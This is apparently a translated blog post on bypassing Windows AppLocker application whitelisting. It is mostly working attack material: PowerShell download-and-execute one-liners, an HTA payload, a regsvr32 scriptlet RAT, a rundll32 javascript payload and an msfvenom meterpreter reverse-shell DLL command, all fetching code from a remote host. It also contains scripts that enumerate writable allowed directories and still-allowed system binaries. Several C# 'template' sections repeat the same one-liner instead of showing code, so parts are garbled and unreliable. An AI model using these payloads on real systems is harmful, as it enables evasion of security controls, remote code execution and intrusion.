
AppLocker Bypass Techniques

from:
https://www.youtube.com/watch?v=z04NXAkhI4k

0x00 cmd and PowerShell are not blocked, only scripts are

With only script rules enforced, powershell.exe and cmd.exe still start, so the payload is fed to them as command-line text or through a pipe instead of as a .ps1/.bat file on disk. The one-liners below also assume PowerShell runs in FullLanguage mode: on PowerShell 5 and later, enforced AppLocker script rules put the session into Constrained Language Mode, where New-Object Net.WebClient is itself refused, so check $ExecutionContext.SessionState.LanguageMode first.


1. Run the payload directly from cmd / PowerShell

Powershell:


IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

Command:


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

2. Pipe the script content into the interpreter (the file itself is never "executed", so script rules do not see it)

Powershell:


Get-Content script.ps1 | iex

Command:


cmd.exe /K < payload.bat

3. HTA (executed by mshta.exe, a signed Windows binary that the default rules allow)

payload.hta


<HTML>
<HEAD>
<script language="VBScript">
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')"
</script>
</HEAD>
<BODY>
</BODY>
</HTML>

4. Regsvr32.exe

regsvr32.exe is a signed Windows binary, so the default rules allow it; /i hands the scriptlet to scrobj.dll, which runs its JScript, and /n /u /s keep anything from being registered and suppress dialogs. The scriptlet can be a local file or a URL:


regsvr32 /u /n /s /i:payload.sct scrobj.dll

regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

payload.sct:


<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            rat="powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')";
            new ActiveXObject("WScript.Shell").Run(rat,0,true);
        ]]>
    </script>
</registration>
</scriptlet>

5. rundll32

payload:


rundll32.exe javascript:"/../mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

6. DLL / CPL

payload.dll


msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll

Run:


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

Alternatively, rename the DLL to .cpl and double-click it.

7. nishang file backdoors


nishang Client: http://drops.wooyun.org/tips/8568

0x01 Executable directories

AppLocker's default rules allow everything under %WINDIR% and %PROGRAMFILES%, so a subdirectory there that a standard user can write to is a place to drop and run payloads. Use a PowerShell script to scan those directories for writable paths.

Download: http://go.mssec.se/AppLockerBC

Scan the executable paths (screenshot in the original).

Execute from the writable allowed path to bypass AppLocker (screenshot in the original).
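As an added example (this is not the AppLockerBC script linked above and is not from the original video), the following PowerShell reads the effective AppLocker policy, expands the path variables of the Allow rules in the Exe, Script and Dll collections, and walks those directories probing whether the current user can create a file in them. Directories covered by an explicit Deny path rule are skipped, because Deny wins over Allow in AppLocker. The function names and the probe-file approach are this example's own; it assumes the AppLocker module (Get-AppLockerPolicy) is present and therefore has to run from a PowerShell that AppLocker still allows.

```powershell
# Added example (not the AppLockerBC script): find directories a standard user can
# write to inside the paths that AppLocker Allow rules cover.
# Assumes the AppLocker module (Get-AppLockerPolicy) is available on this host.
Import-Module AppLocker -ErrorAction Stop

# Path variables AppLocker uses in its rules, mapped to concrete directories.
$pathVars = @{
    '%WINDIR%'       = @($env:windir)
    '%SYSTEM32%'     = @("$env:windir\System32")
    '%PROGRAMFILES%' = @($env:ProgramFiles, ${env:ProgramFiles(x86)} | Where-Object { $_ })
    '%OSDRIVE%'      = @($env:SystemDrive)
}

# Turn a path condition such as "%PROGRAMFILES%\*" into concrete directory roots.
# Conditions with wildcards elsewhere in the path are skipped rather than guessed at.
function Expand-AppLockerPath {
    param([string]$Path)
    $expanded = @($Path)
    foreach ($var in $pathVars.Keys) {
        $expanded = @($expanded | ForEach-Object {
            $p = $_
            if ($p -like "*$var*") {
                foreach ($value in $pathVars[$var]) { $p -replace [regex]::Escape($var), $value }
            } else { $p }
        })
    }
    $expanded |
        ForEach-Object { $_ -replace '\\?\*$', '' } |                    # strip the trailing "\*"
        Where-Object { $_ -and $_ -notmatch '\*' } |                      # drop "*" (all files) and mid-path wildcards
        ForEach-Object { if ($_ -match ':$') { "$_\" } else { $_ } }      # "C:" -> "C:\"
}

# Probe write access by creating and deleting a randomly named file.
function Test-WritableDirectory {
    param([string]$Dir)
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try {
        $fs = [IO.File]::Create($probe)      # throws UnauthorizedAccessException without write access
        $fs.Close()
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

# Walk every allowed root and report writable directories not covered by a Deny rule.
function Get-WritableAllowedDirectories {
    param([string[]]$Roots, [string[]]$DenyPrefixes)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root -PathType Container)) { continue }
        $dirs = @(Get-Item -LiteralPath $root -Force) +
                @(Get-ChildItem -LiteralPath $root -Directory -Recurse -Force -ErrorAction SilentlyContinue)
        foreach ($dir in $dirs) {
            $full = $dir.FullName
            if ($DenyPrefixes | Where-Object { $full.StartsWith($_, 'OrdinalIgnoreCase') }) { continue }
            if (Test-WritableDirectory -Dir $full) { $full }
        }
    }
}

[xml]$policy = Get-AppLockerPolicy -Effective -Xml
$pathRules = @($policy.AppLockerPolicy.RuleCollection |
    Where-Object { $_.Type -in 'Exe', 'Script', 'Dll' } |
    ForEach-Object { $_.FilePathRule } |
    Where-Object { $_ })

# Rules granted only to Administrators (S-1-5-32-544) do not help a standard user.
$allowRoots = @($pathRules |
    Where-Object { $_.Action -eq 'Allow' -and $_.UserOrGroupSid -ne 'S-1-5-32-544' } |
    ForEach-Object { Expand-AppLockerPath $_.Conditions.FilePathCondition.Path } |
    Select-Object -Unique)

# Explicit Deny rules win over Allow rules, so writable directories under them are useless.
$denyPrefixes = @($pathRules |
    Where-Object { $_.Action -eq 'Deny' } |
    ForEach-Object { Expand-AppLockerPath $_.Conditions.FilePathCondition.Path } |
    Select-Object -Unique)

Get-WritableAllowedDirectories -Roots $allowRoots -DenyPrefixes $denyPrefixes | Sort-Object -Unique
```

Walking all of %WINDIR% takes a few minutes. A hit only means the directory is writable; you still need read and execute access there to launch the dropped file, and if the policy enforces DLL rules a payload DLL must also sit under an allowed path. On a hardened policy the classic locations (Tasks, Temp, tracing) show up as Deny prefixes and are filtered out, which is exactly the defender-side fix for this section.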

0x02 After PowerShell is blocked

Configure a rule that blocks powershell.exe (screenshot in the original).

Opening PowerShell again after it is blocked (screenshot in the original).

1. Run PowerShell through .NET

Bypass by running PowerShell from .NET, hosting the PowerShell engine inside a compiled assembly instead of starting the blocked powershell.exe:

C# template: powershell.cs


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

The compiled exe cannot be run directly (the Exe rules block it); copy it into an allowed executable directory and run it from there, and it invokes PowerShell.

2. InstallUtil


Reference 1: http://drops.wooyun.org/tips/8862

Reference 2: http://drops.wooyun.org/tips/8701

InstallUtil.cs


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

After compiling, run it through InstallUtil.exe with the /U parameter. /U calls the assembly's Installer.Uninstall method, which needs neither a prior install nor administrator rights, so the payload goes into Uninstall:


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')


3. Regasm & Regsvcs


Regasm.cs


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

Usage:


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')


4. nishang file backdoors

Even with PowerShell blocked, shellcode can still be executed, for example through an HTA or an Office macro.
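As an added example that is not from the original video, the following PowerShell asks the effective AppLocker policy whether the signed Microsoft binaries this section depends on (InstallUtil.exe, RegAsm.exe, RegSvcs.exe, plus csc.exe for building the templates and regsvr32/rundll32/mshta from 0x00) would still be allowed for Everyone once powershell.exe itself is denied, and reports the language mode and script enforcement state of the session it runs in. The file paths are the standard .NET Framework 4 and System32 locations; the function names are this example's own. Run it from an elevated or otherwise still-allowed PowerShell, since in the blocked scenario a standard user cannot start one.

```powershell
# Added example: check which living-off-the-land binaries the effective AppLocker
# policy still allows after powershell.exe has been denied.
# Assumes the AppLocker module (Get-AppLockerPolicy / Test-AppLockerPolicy) is available.
Import-Module AppLocker -ErrorAction Stop

function Get-LolbinDecisions {
    param([string]$User = 'Everyone')
    # 32-bit CLR directory; the 64-bit copies live under Framework64 with the same names.
    $net = "$env:windir\Microsoft.NET\Framework\v4.0.30319"
    $candidates = @(
        "$env:windir\System32\WindowsPowerShell\v1.0\powershell.exe",
        "$env:windir\System32\cmd.exe",
        "$env:windir\System32\mshta.exe",
        "$env:windir\System32\regsvr32.exe",
        "$env:windir\System32\rundll32.exe",
        "$net\csc.exe",
        "$net\InstallUtil.exe",
        "$net\RegAsm.exe",
        "$net\RegSvcs.exe"
    ) | Where-Object { Test-Path -LiteralPath $_ }

    # Test-AppLockerPolicy evaluates the Exe collection for each path as the given user
    # and names the rule that produced the decision.
    Get-AppLockerPolicy -Effective |
        Test-AppLockerPolicy -Path $candidates -User $User |
        Select-Object FilePath, PolicyDecision, MatchingRule
}

# Enforced Script rules also put PowerShell 5+ into ConstrainedLanguage mode, which is
# what actually breaks the New-Object Net.WebClient one-liners used earlier.
function Get-PowerShellRestrictions {
    $scriptMode = ([xml](Get-AppLockerPolicy -Effective -Xml)).AppLockerPolicy.RuleCollection |
        Where-Object { $_.Type -eq 'Script' } |
        ForEach-Object { $_.EnforcementMode }
    [pscustomobject]@{
        PSVersion     = $PSVersionTable.PSVersion
        LanguageMode  = $ExecutionContext.SessionState.LanguageMode
        ScriptRules   = if ($scriptMode) { $scriptMode } else { 'NotConfigured' }
    }
}

Get-PowerShellRestrictions | Format-List
Get-LolbinDecisions | Format-Table -AutoSize
```

On a policy that only adds a Deny for powershell.exe to the default rules, every other candidate comes back Allowed with the "All files located in the Windows folder" default rule as MatchingRule, which is why techniques 1 to 3 above keep working. The defender-side fix is an explicit Deny rule for InstallUtil.exe, RegAsm.exe, RegSvcs.exe and the other interpreters, since Deny rules take precedence over Allow rules.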

0x03 Privilege escalation

AppLocker's default rules include "Allow Administrators all files" in every collection, so once you escalate to an administrator the restrictions no longer apply: exe files and scripts run normally, and the policy itself can be edited or cleared.

Reproduction without permission is prohibited: 杂术馆 » AppLocker Bypass Techniques